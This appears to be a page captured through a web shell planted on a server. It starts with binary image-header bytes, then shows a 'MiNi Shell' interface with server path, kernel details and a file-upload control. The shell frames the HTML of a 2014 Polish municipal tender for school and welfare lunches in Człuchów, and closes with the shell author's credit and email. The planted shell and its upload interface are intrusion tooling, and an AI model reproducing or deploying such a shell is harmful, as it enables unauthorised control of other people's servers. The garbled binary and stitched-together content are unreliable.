JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140917/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140917/309776-N-2014.html

<p class="kh_header"><b>Człuchów: przygotowywanie i wydawanie obiadów dwudaniowych uczniom Szkoły Podstawowej Nr 1 Gimnazjum Nr 1  Klientom Miejskiego Ośrodka Pomocy Społecznej w Człuchowie oraz wydawanie uczniom mleka owoców i warzyw zapewnianych przez szkołę
w pomieszczeniach dzierżawionych w Szkole Podstawowej Nr 1 w Człuchowie</b><br>
<b>Numer ogłoszenia: 309776 - 2014; data zamieszczenia: 17.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Średnia 14, 77-300 Człuchów, woj. pomorskie, tel. 0-59 8342409, 8344321, faks 0-59 8344321.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> przygotowywanie i wydawanie obiadów dwudaniowych uczniom Szkoły Podstawowej Nr 1 Gimnazjum Nr 1  Klientom Miejskiego Ośrodka Pomocy Społecznej w Człuchowie oraz wydawanie uczniom mleka owoców i warzyw zapewnianych przez szkołę
w pomieszczeniach dzierżawionych w Szkole Podstawowej Nr 1 w Człuchowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przygotowywanie dostarczanie i wydawanie obiadów dwudaniowych w ilościach nieprzekraczających  potrzeby Zamawiającego dla uczniów Szkoły Podstawowej Nr 1 i Gimnazjum Nr 1 w Człuchowie którzy otrzymają decyzję administracyjną przyznającą pomoc w formie obiadów wystawioną przez MOPS w Człuchowie osób dorosłych, które otrzymają decyzję administracyjną przyznającą pomoc w formie  obiadów  wystawioną przez MOPS  w Człuchowie.
Dla obiadów dla uczniów Szkoły Podstawowej Nr 1 w Człuchowie, wymienionych powyżej stosuje się wymagania ilościowe określone odpowiednio 
pn. mniejsze porcje
 pierwszego dania zupy min. 330 g i chleb min. 100g
 drugiego dania na które składają się m.in. 
ziemniaki min. 250g, lub zamiennie kasza ryż kluski makaron łazanki pierogi min. 300g     
mięso lub zamiennie ryby kiełbasa drób min. 100 g 
dodatki  zestaw surówek, warzywa gotowane, sałatki itp. min. 100 g 
kompot,  napój min. 200 ml lub owoc min. 50 g lub jogurt  min. 100 g      
Zapewnienie posiłku o wartości kalorycznej nie mniejszej niż  30% całodziennego zapotrzebowania energetycznego uczniów tj. 870 kcal.

Dla obiadów dla Gimnazjum Nr 1 w Człuchowie i  osób dorosłych  klientów MOPS wymienionych powyżej stosuje się wymagania  ilościowe określone odpowiednio 
pn. większe porcje  pierwszego dania: zupy min. 500 g i chleb min. 150g
drugiego dania: na które składają się m.in.  ziemniaki min. 300g lub zamiennie kasza ryż kluski makaron łazanki pierogi min. 350g  mięso lub zamiennie ryby kiełbasa drób min. 150 g dodatki  zestaw surówek warzywa gotowane sałatki itp. min. 150 g kompot  napój min. 250 ml lub owoc min. 50 g lub jogurt min.100 g   Zapewnienie posiłku o wartości kalorycznej nie mniejszej niż 1080 kcal.
Podane gramatury są już po obróbce termicznej.  
Ponadto Wykonawca zobowiązuje się do wydawania 2 lub 3 razy w tygodniu zależnie od potrzeb warzyw owoców i mleka  dostarczanych przez szkołę w ramach realizacja programu Szklanka mleka  i  Owoce  w szkole w którym uczniowie bezpłatnie otrzymują mleko, owoce  i warzywa .
Wymagania dotyczące sposobu przyrządzania i podawania obiadów pod względem składu i jakości zgodne z normami żywienia dzieci w wieku szkolnym zawartymi w obowiązujących przepisach z uwzględnieniem wymogów sanitarno higienicznych zgodnie z Ustawą z dnia 25 sierpnia 2006 r.  o bezpieczeństwie żywności i żywienia Dz.U. z 2010 r. nr 136, poz. 914 z późn. zm. oraz norm żywienia w poszczególnych grupach wiekowych oraz zaleceniami Instytutu Żywności i Żywienia.
Zamawiający zastrzega, że posiłki muszą spełniać następujące warunki jakościowe: 
Obiady Obiady dwudaniowe zupa i chleb  drugie danie surówka deser Co najmniej 3 razy obiad z mięsem w tym 1 raz sztuka mięsa, a w pozostałe dni naprzemiennie ryba, dania mięsno  warzywne, dania na bazie twarogu,  jaj  wraz z surówką lub warzywami, Nie częściej niż dwa razy w miesiącu podawane będą dania makaronowe,  raz na miesiąc naleśniki lub racuchy, Nie dopuszcza się produktów typu instant, gotowych sosów i ziemniaków w proszku typu puree. Obiady muszą być z surowców takich jak:  z nieprzetworzonego wcześniej mięsa, surowych warzyw w okresie  posezonowym  dopuszcza się stosowania mrożonek warzywno owocowych Dodatki do obiadu 2 razy w tygodniu np. jogurt lub owoce
Potrawy powinny być lekkostrawne, przygotowywane z surowców wysokiej jakości, świeżych, naturalnych, mało przetworzonych, z ograniczoną ilością substancji dodatkowych  konserwujących, zagęszczających, barwiących lub sztucznie aromatyzowanych,  W jadłospisie powinny przeważać potrawy gotowane, pieczone i duszone, okazjonalnie smażone, Możliwość dokładek  zupa, surówka, kompot Jadłospis powinien być urozmaicony; rodzaj potrawy nie może powtarzać się w okresie dwutygodniowym, w planowaniu jadłospisów należy uwzględnić sezonowość występowania produktów. 
W ramach podawanych potraw możliwość podawania potraw dietetycznych
Deser
Napój Kompot Owoc Jogurt
Kompoty gotowane ze świeżych owoców, a w okresie posezonowym mogą być stosowane owoce mrożone,  suszone lub kompoty. 
Obiady powinny być sycące, smaczne, urozmaicone, bezwzględnie świeże i przyrządzane w dniu wydawania.
Wykonawca będzie przygotowywał i dostarczał posiłki zachowując wymogi sanitarno-epidemiologiczne w zakresie personelu i warunków produkcji oraz weźmie odpowiedzialność za ich przestrzeganie. Wykonawca zobowiązany jest do przygotowania posiłków o najwyższym standardzie, na bazie produktów najwyższej jakości i bezpieczeństwem zgodnie z normami HACCP.
Osoby obsługujące winny posiadać aktualne badania sanitarno-epidemiologiczne, także kulturę osobistą  i nienaganny sposób zachowania.
Obowiązkiem Wykonawcy jest przechowywanie próbek pokarmowych ze wszystkich przygotowanych i dostarczonych posiłków, każdego dnia przez okres 72 godzin z oznaczeniem daty, godziny, zawartości próbki pokarmowej z podpisem osoby odpowiedzialnej za pobieranie tych próbek.
Obiady w stołówce Szkoły Podstawowej Nr 1 w Człuchowie należy wydawać dla:
uczniów Szkoły Podstawowej Nr 1 i młodzieży  Gimnazjum Nr 1 w Człuchowie,  codziennie z wyłączeniem ustawowych dni wolnych od pracy i nauki szkolnej tj. soboty, niedziele, święta oraz ferie świąteczne, zimowe i letnie w godzinach od 12:00 do 13:15.  
Dopuszcza się możliwość wydawania obiadów dla uczniów również w okresie ferii świątecznych, zimowych po wcześniejszym uzgodnieniu pomiędzy Zamawiającym i Wykonawcą.
osobom dorosłym  codziennie z wyłączeniem ustawowych dni wolnych od pracy tj. soboty, niedziele, święta wyłączenie nie dotyczy osób przebywających w Noclegowni im. Św. Brata Alberta w Człuchowi) w godzinach od 13:25 do 15:00  Wykonawca jest zobowiązany do przestrzegania wymogów sanitarno  higienicznych zgodnie z Ustawą z dnia 25 sierpnia 2006 r. o bezpieczeństwie    
 żywności i żywienia Dz. U. z 2010 r. nr 136, poz. 914 z późn. zm. m.in.:
Przygotowanie oraz produkcja posiłków zgodnie z zachowaniem systemu GMP i GHP,Właściwy sposób porcjowania posiłków z zachowaniem odpowiedniej temperatury,Pakowanie posiłków obiadowych w pojemniki GN z zachowaniem reżimu sanitarnego,Transport posiłków od kuchni wykonawcy do miejsca wydawania posiłków środkiem transportu przeznaczonym do tego celu,
Wydawanie posiłków obiadowych w miejscu wyznaczonym przez zamawiającego w sposób zgodny z Dobrą Praktyką Produkcyjną,Zachowanie higieny wydawania posiłków,Zabezpieczenie środków czystości oraz środków specjalistycznych w miejscu wydawania posiłków,Zabezpieczenie naczyń stołowych wielorazowych oraz kubków i sztućców.Zmywanie z wyparzaniem naczyń stołowych.
oraz norm żywienia w poszczególnych grupach wiekowych oraz zaleceniami Instytutu Żywności i Żywienia, tj.Utrzymanie odpowiedniej wartości kalorycznej w poszczególnych grupach wiekowych,Posiłki mają być przygotowane wg zróżnicowanych jadłospisów,Zapewnienie posiłku o wartości kalorycznej nie mniejszej niż 1080 kcal dla osób dorosłych.
Zapewnienie posiłku o wartości kalorycznej nie mniejszej niż 870 kcal dla uczniów
Wykonawca dolicza do kalkulacji ceny obiadu poniesione koszty  zgodnie  z Załącznikiem Nr 13 - Postanowieniami do umowy dzierżawy określonymi do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.32.00.00-9, 55.32.10.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że wykonawca spełnia warunki udziału w postępowaniu z art 22 ust 1 ustawy pzp należy złożyć następujące dokumenty:
oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 ust.1 ustawy Prawa zamówień publicznych -  z wg wzoru stanowiącego załącznik nr 2 do SIWZ
dokument potwierdzający, że wykonawca jest wpisany do Rejestru Zakładów podlegających urzędowej kontroli organów Państwowej Inspekcji Sanitarnej, zgodnie z ustawą z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz.U.z 2010r. 136, 914 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia  należy złożyć następujące dokumenty: 
wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów czy zostały wykonane lub są wykonywane należycie. W celu zweryfikowania rzetelności, kwalifikacji, efektywności i doświadczenia wykonawcy zamawiający określa usługi, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń,       w tym wskazania z wykazie informacji o usługach niewykonanych lub wykonanych nienależycie - wg wzoru stanowiącego załącznik nr 6 do SIWZ.
Wykonawcy muszą wykazać minimum jedną usługę polegającą na żywieniu zbiorowym grupy min. 150 osób w tym dzieci w jednej placówce, trwającą nieprzerwanie przez okres co najmniej 12 miesięcy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz osób, które będą uczestniczyć w wykonaniu zamówienia wraz z informacją na temat ich doświadczenia oraz informacją o podstawie dysponowania tymi osobami   wg wzoru stanowiącego załącznik nr 7 do SIWZ.   wykaz narzędzi dostępnych wykonawcy usług w celu wykonania zamówienia wraz z informacją o podstawie dysponowania tymi zasobami  wg wzoru stanowiącego załącznik nr 8 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku posiadania sytuacji ekonomicznej i finansowej należy złożyć: 
opłaconą polisę ubezpieczenia od odpowiedzialności cywilnej, a w przypadku jej braku inny dokument - potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej przez niego działalności na kwotę nie mniejszą niż 20.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopsczluchow.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Człuchowie
Ul. Średnia 12A, 77-300 Człuchów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.09.2014 godzina 09:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Człuchowie
Ul. Średnia 12A, 77-300 Człuchów
pokój nr 7 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com